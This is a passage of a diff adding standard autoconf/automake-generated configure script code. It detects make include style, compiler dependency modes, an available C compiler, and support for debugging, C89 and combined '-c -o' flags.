+esac +# Now try BSD make style include. +if test "$am__include" = "#"; then + echo '.include "confinc"' > confmf + case `$am_make -s -f confmf 2> /dev/null` in #( + *the\ am__doit\ target*) + am__include=.include + am__quote="\"" + _am_result=BSD + ;; + esac +fi + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $_am_result" >&5 +$as_echo "$_am_result" >&6; } +rm -f confinc confmf + +@%:@ Check whether --enable-dependency-tracking was given. +if test "${enable_dependency_tracking+set}" = set; then : + enableval=$enable_dependency_tracking; +fi + +if test "x$enable_dependency_tracking" != xno; then + am_depcomp="$ac_aux_dir/depcomp" + AMDEPBACKSLASH='\' +fi + if test "x$enable_dependency_tracking" != xno; then + AMDEP_TRUE= + AMDEP_FALSE='#' +else + AMDEP_TRUE='#' + AMDEP_FALSE= +fi + + + +depcc="$CXX" am_compiler_list= + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking dependency style of $depcc" >&5 +$as_echo_n "checking dependency style of $depcc... " >&6; } +if test "${am_cv_CXX_dependencies_compiler_type+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then + # We make a subdir and do the tests there. Otherwise we can end up + # making bogus files that we don't know about and never remove. For + # instance it was reported that on HP-UX the gcc test will end up + # making a dummy file named `D' -- because `-MD' means `put the output + # in D'. + mkdir conftest.dir + # Copy depcomp to subdir because otherwise we won't find it if we're + # using a relative directory. + cp "$am_depcomp" conftest.dir + cd conftest.dir + # We will build objects and dependencies in a subdirectory because + # it helps to detect inapplicable dependency modes. For instance + # both Tru64's cc and ICC support -MD to output dependencies as a + # side effect of compilation, but ICC will put the dependencies in + # the current directory while Tru64 will put them in the object + # directory. + mkdir sub + + am_cv_CXX_dependencies_compiler_type=none + if test "$am_compiler_list" = ""; then + am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp` + fi + am__universal=false + case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac + + for depmode in $am_compiler_list; do + # Setup a source with many dependencies, because some compilers + # like to wrap large dependency lists on column 80 (with \), and + # we should not choose a depcomp mode which is confused by this. + # + # We need to recreate these files for each test, as the compiler may + # overwrite some of them when testing with obscure command lines. + # This happens at least with the AIX C compiler. + : > sub/conftest.c + for i in 1 2 3 4 5 6; do + echo '#include "conftst'$i'.h"' >> sub/conftest.c + # Using `: > sub/conftst$i.h' creates only sub/conftst1.h with + # Solaris 8's {/usr,}/bin/sh. + touch sub/conftst$i.h + done + echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf + + # We check with `-c' and `-o' for the sake of the "dashmstdout" + # mode. It turns out that the SunPro C++ compiler does not properly + # handle `-M -o', and we need to detect this. Also, some Intel + # versions had trouble with output in subdirs + am__obj=sub/conftest.${OBJEXT-o} + am__minus_obj="-o $am__obj" + case $depmode in + gcc) + # This depmode causes a compiler race in universal mode. + test "$am__universal" = false || continue + ;; + nosideeffect) + # after this tag, mechanisms are not by side-effect, so they'll + # only be used when explicitly requested + if test "x$enable_dependency_tracking" = xyes; then + continue + else + break + fi + ;; + msvisualcpp | msvcmsys) + # This compiler won't grok `-c -o', but also, the minuso test has + # not run yet. These depmodes are late enough in the game, and + # so weak that their functioning should not be impacted. + am__obj=conftest.${OBJEXT-o} + am__minus_obj= + ;; + none) break ;; + esac + if depmode=$depmode \ + source=sub/conftest.c object=$am__obj \ + depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ + $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ + >/dev/null 2>conftest.err && + grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && + grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && + grep $am__obj sub/conftest.Po > /dev/null 2>&1 && + ${MAKE-make} -s -f confmf > /dev/null 2>&1; then + # icc doesn't choke on unknown options, it will just issue warnings + # or remarks (even with -Werror). So we grep stderr for any message + # that says an option was ignored or not supported. + # When given -MP, icc 7.0 and 7.1 complain thusly: + # icc: Command line warning: ignoring option '-M'; no argument required + # The diagnosis changed in icc 8.0: + # icc: Command line remark: option '-MP' not supported + if (grep 'ignoring option' conftest.err || + grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else + am_cv_CXX_dependencies_compiler_type=$depmode + break + fi + fi + done + + cd .. + rm -rf conftest.dir +else + am_cv_CXX_dependencies_compiler_type=none +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_CXX_dependencies_compiler_type" >&5 +$as_echo "$am_cv_CXX_dependencies_compiler_type" >&6; } +CXXDEPMODE=depmode=$am_cv_CXX_dependencies_compiler_type + + if + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_CXX_dependencies_compiler_type" = gcc3; then + am__fastdepCXX_TRUE= + am__fastdepCXX_FALSE='#' +else + am__fastdepCXX_TRUE='#' + am__fastdepCXX_FALSE= +fi + + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}gcc", so it can be a program name with args. +set dummy ${ac_tool_prefix}gcc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CC="${ac_tool_prefix}gcc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + +fi +if test -z "$ac_cv_prog_CC"; then + ac_ct_CC=$CC + # Extract the first word of "gcc", so it can be a program name with args. +set dummy gcc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_CC="gcc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 +$as_echo "$ac_ct_CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + if test "x$ac_ct_CC" = x; then + CC="" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + CC=$ac_ct_CC + fi +else + CC="$ac_cv_prog_CC" +fi + +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}cc", so it can be a program name with args. +set dummy ${ac_tool_prefix}cc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CC="${ac_tool_prefix}cc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + fi +fi +if test -z "$CC"; then + # Extract the first word of "cc", so it can be a program name with args. +set dummy cc; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else + ac_prog_rejected=no +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + if test "$as_dir/$ac_word$ac_exec_ext" = "/usr/ucb/cc"; then + ac_prog_rejected=yes + continue + fi + ac_cv_prog_CC="cc" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +if test $ac_prog_rejected = yes; then + # We found a bogon in the path, so make sure we never use it. + set dummy $ac_cv_prog_CC + shift + if test $@%:@ != 0; then + # We chose a different compiler from the bogus one. + # However, it has the same basename, so the bogon will be chosen + # first if we set CC to just the basename; use the full file name. + shift + ac_cv_prog_CC="$as_dir/$ac_word${1+' '}$@" + fi +fi +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + +fi +if test -z "$CC"; then + if test -n "$ac_tool_prefix"; then + for ac_prog in cl.exe + do + # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. +set dummy $ac_tool_prefix$ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CC"; then + ac_cv_prog_CC="$CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CC="$ac_tool_prefix$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CC=$ac_cv_prog_CC +if test -n "$CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 +$as_echo "$CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$CC" && break + done +fi +if test -z "$CC"; then + ac_ct_CC=$CC + for ac_prog in cl.exe +do + # Extract the first word of "$ac_prog", so it can be a program name with args. +set dummy $ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_CC+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_CC"; then + ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_CC="$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_CC=$ac_cv_prog_ac_ct_CC +if test -n "$ac_ct_CC"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 +$as_echo "$ac_ct_CC" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$ac_ct_CC" && break +done + + if test "x$ac_ct_CC" = x; then + CC="" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + CC=$ac_ct_CC + fi +fi + +fi + + +test -z "$CC" && { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "no acceptable C compiler found in \$PATH +See \`config.log' for more details." "$LINENO" 5; } + +# Provide some information about the compiler. +$as_echo "$as_me:${as_lineno-$LINENO}: checking for C compiler version" >&5 +set X $ac_compile +ac_compiler=$2 +for ac_option in --version -v -V -qversion; do + { { ac_try="$ac_compiler $ac_option >&5" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compiler $ac_option >&5") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + sed '10a\ +... rest of stderr output deleted ... + 10q' conftest.err >conftest.er1 + cat conftest.er1 >&5 + fi + rm -f conftest.er1 conftest.err + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } +done + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are using the GNU C compiler" >&5 +$as_echo_n "checking whether we are using the GNU C compiler... " >&6; } +if test "${ac_cv_c_compiler_gnu+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ +#ifndef __GNUC__ + choke me +#endif + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_compiler_gnu=yes +else + ac_compiler_gnu=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +ac_cv_c_compiler_gnu=$ac_compiler_gnu + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_c_compiler_gnu" >&5 +$as_echo "$ac_cv_c_compiler_gnu" >&6; } +if test $ac_compiler_gnu = yes; then + GCC=yes +else + GCC= +fi +ac_test_CFLAGS=${CFLAGS+set} +ac_save_CFLAGS=$CFLAGS +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CC accepts -g" >&5 +$as_echo_n "checking whether $CC accepts -g... " >&6; } +if test "${ac_cv_prog_cc_g+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + ac_save_c_werror_flag=$ac_c_werror_flag + ac_c_werror_flag=yes + ac_cv_prog_cc_g=no + CFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_prog_cc_g=yes +else + CFLAGS="" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + +else + ac_c_werror_flag=$ac_save_c_werror_flag + CFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_prog_cc_g=yes +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext + ac_c_werror_flag=$ac_save_c_werror_flag +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_g" >&5 +$as_echo "$ac_cv_prog_cc_g" >&6; } +if test "$ac_test_CFLAGS" = set; then + CFLAGS=$ac_save_CFLAGS +elif test $ac_cv_prog_cc_g = yes; then + if test "$GCC" = yes; then + CFLAGS="-g -O2" + else + CFLAGS="-g" + fi +else + if test "$GCC" = yes; then + CFLAGS="-O2" + else + CFLAGS= + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $CC option to accept ISO C89" >&5 +$as_echo_n "checking for $CC option to accept ISO C89... " >&6; } +if test "${ac_cv_prog_cc_c89+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + ac_cv_prog_cc_c89=no +ac_save_CC=$CC +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include +#include +#include +#include +/* Most of the following tests are stolen from RCS 5.7's src/conf.sh. */ +struct buf { int x; }; +FILE * (*rcsopen) (struct buf *, struct stat *, int); +static char *e (p, i) + char **p; + int i; +{ + return p[i]; +} +static char *f (char * (*g) (char **, int), char **p, ...) +{ + char *s; + va_list v; + va_start (v,p); + s = g (p, va_arg (v,int)); + va_end (v); + return s; +} + +/* OSF 4.0 Compaq cc is some sort of almost-ANSI by default. It has + function prototypes and stuff, but not '\xHH' hex character constants. + These don't provoke an error unfortunately, instead are silently treated + as 'x'. The following induces an error, until -std is added to get + proper ANSI mode. Curiously '\x00'!='x' always comes out true, for an + array size at least. It's necessary to write '\x00'==0 to get something + that's true only with -std. */ +int osf4_cc_array ['\x00' == 0 ? 1 : -1]; + +/* IBM C 6 for AIX is almost-ANSI by default, but it replaces macro parameters + inside strings and character constants. */ +#define FOO(x) 'x' +int xlc6_cc_array[FOO(a) == 'x' ? 1 : -1]; + +int test (int i, double x); +struct s1 {int (*f) (int a);}; +struct s2 {int (*f) (double a);}; +int pairnames (int, char **, FILE *(*)(struct buf *, struct stat *, int), int, int); +int argc; +char **argv; +int +main () +{ +return f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1]; + ; + return 0; +} +_ACEOF +for ac_arg in '' -qlanglvl=extc89 -qlanglvl=ansi -std \ + -Ae "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__" +do + CC="$ac_save_CC $ac_arg" + if ac_fn_c_try_compile "$LINENO"; then : + ac_cv_prog_cc_c89=$ac_arg +fi +rm -f core conftest.err conftest.$ac_objext + test "x$ac_cv_prog_cc_c89" != "xno" && break +done +rm -f conftest.$ac_ext +CC=$ac_save_CC + +fi +# AC_CACHE_VAL +case "x$ac_cv_prog_cc_c89" in + x) + { $as_echo "$as_me:${as_lineno-$LINENO}: result: none needed" >&5 +$as_echo "none needed" >&6; } ;; + xno) + { $as_echo "$as_me:${as_lineno-$LINENO}: result: unsupported" >&5 +$as_echo "unsupported" >&6; } ;; + *) + CC="$CC $ac_cv_prog_cc_c89" + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_c89" >&5 +$as_echo "$ac_cv_prog_cc_c89" >&6; } ;; +esac +if test "x$ac_cv_prog_cc_c89" != xno; then : + +fi + +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu + +depcc="$CC" am_compiler_list= + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking dependency style of $depcc" >&5 +$as_echo_n "checking dependency style of $depcc... " >&6; } +if test "${am_cv_CC_dependencies_compiler_type+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then + # We make a subdir and do the tests there. Otherwise we can end up + # making bogus files that we don't know about and never remove. For + # instance it was reported that on HP-UX the gcc test will end up + # making a dummy file named `D' -- because `-MD' means `put the output + # in D'. + mkdir conftest.dir + # Copy depcomp to subdir because otherwise we won't find it if we're + # using a relative directory. + cp "$am_depcomp" conftest.dir + cd conftest.dir + # We will build objects and dependencies in a subdirectory because + # it helps to detect inapplicable dependency modes. For instance + # both Tru64's cc and ICC support -MD to output dependencies as a + # side effect of compilation, but ICC will put the dependencies in + # the current directory while Tru64 will put them in the object + # directory. + mkdir sub + + am_cv_CC_dependencies_compiler_type=none + if test "$am_compiler_list" = ""; then + am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp` + fi + am__universal=false + case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac + + for depmode in $am_compiler_list; do + # Setup a source with many dependencies, because some compilers + # like to wrap large dependency lists on column 80 (with \), and + # we should not choose a depcomp mode which is confused by this. + # + # We need to recreate these files for each test, as the compiler may + # overwrite some of them when testing with obscure command lines. + # This happens at least with the AIX C compiler. + : > sub/conftest.c + for i in 1 2 3 4 5 6; do + echo '#include "conftst'$i'.h"' >> sub/conftest.c + # Using `: > sub/conftst$i.h' creates only sub/conftst1.h with + # Solaris 8's {/usr,}/bin/sh. + touch sub/conftst$i.h + done + echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf + + # We check with `-c' and `-o' for the sake of the "dashmstdout" + # mode. It turns out that the SunPro C++ compiler does not properly + # handle `-M -o', and we need to detect this. Also, some Intel + # versions had trouble with output in subdirs + am__obj=sub/conftest.${OBJEXT-o} + am__minus_obj="-o $am__obj" + case $depmode in + gcc) + # This depmode causes a compiler race in universal mode. + test "$am__universal" = false || continue + ;; + nosideeffect) + # after this tag, mechanisms are not by side-effect, so they'll + # only be used when explicitly requested + if test "x$enable_dependency_tracking" = xyes; then + continue + else + break + fi + ;; + msvisualcpp | msvcmsys) + # This compiler won't grok `-c -o', but also, the minuso test has + # not run yet. These depmodes are late enough in the game, and + # so weak that their functioning should not be impacted. + am__obj=conftest.${OBJEXT-o} + am__minus_obj= + ;; + none) break ;; + esac + if depmode=$depmode \ + source=sub/conftest.c object=$am__obj \ + depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ + $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ + >/dev/null 2>conftest.err && + grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && + grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && + grep $am__obj sub/conftest.Po > /dev/null 2>&1 && + ${MAKE-make} -s -f confmf > /dev/null 2>&1; then + # icc doesn't choke on unknown options, it will just issue warnings + # or remarks (even with -Werror). So we grep stderr for any message + # that says an option was ignored or not supported. + # When given -MP, icc 7.0 and 7.1 complain thusly: + # icc: Command line warning: ignoring option '-M'; no argument required + # The diagnosis changed in icc 8.0: + # icc: Command line remark: option '-MP' not supported + if (grep 'ignoring option' conftest.err || + grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else + am_cv_CC_dependencies_compiler_type=$depmode + break + fi + fi + done + + cd .. + rm -rf conftest.dir +else + am_cv_CC_dependencies_compiler_type=none +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_CC_dependencies_compiler_type" >&5 +$as_echo "$am_cv_CC_dependencies_compiler_type" >&6; } +CCDEPMODE=depmode=$am_cv_CC_dependencies_compiler_type + + if + test "x$enable_dependency_tracking" != xno \ + && test "$am_cv_CC_dependencies_compiler_type" = gcc3; then + am__fastdepCC_TRUE= + am__fastdepCC_FALSE='#' +else + am__fastdepCC_TRUE='#' + am__fastdepCC_FALSE= +fi + + +if test "x$CC" != xcc; then + { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CC and cc understand -c and -o together" >&5 +$as_echo_n "checking whether $CC and cc understand -c and -o together... " >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether cc understands -c and -o together" >&5 +$as_echo_n "checking whether cc understands -c and -o together... " >&6; } +fi +set dummy $CC; ac_cc=`$as_echo "$2" | + sed 's/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/'` +if { as_var=ac_cv_prog_cc_${ac_cc}_c_o; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +# Make sure it works both with $CC and with simple cc. +# We do the test twice because some compilers refuse to overwrite an +# existing .o file with -o, though they will create one. +ac_try='$CC -c conftest.$ac_ext -o conftest2.$ac_objext >&5' +rm -f conftest2.* +if { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && + test -f conftest2.$ac_objext && { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; +then + eval ac_cv_prog_cc_${ac_cc}_c_o=yes + if test "x$CC" != xcc; then + # Test first that cc exists at all. + if { ac_try='cc -c conftest.$ac_ext >&5' + { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; }; then + ac_try='cc -c conftest.$ac_ext -o conftest2.$ac_objext >&5' + rm -f conftest2.* + if { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && + test -f conftest2.$ac_objext && { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; + then + # cc works too. + : + else + # cc exists but doesn't like -o. + eval ac_cv_prog_cc_${ac_cc}_c_o=no + fi + fi + fi +else + eval ac_cv_prog_cc_${ac_cc}_c_o=no +fi +rm -f core conftest* + +fi +if eval test \$ac_cv_prog_cc_${ac_cc}_c_o = yes; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } + +$as_echo "@%:@define NO_MINUS_C_MINUS_O 1" >>confdefs.h + +fi + +# FIXME: we rely on the cache variable name because +# there is no other way. +set dummy $CC +am_cc=`echo $2 | sed 's/[^a-zA-Z0-9_]/_/g;s/^[0-9]/_/'` +eval am_t=\$ac_cv_prog_cc_${am_cc}_c_o +if test "$am_t" != yes; then + # Losing compiler, so override with the script. + # FIXME: It is 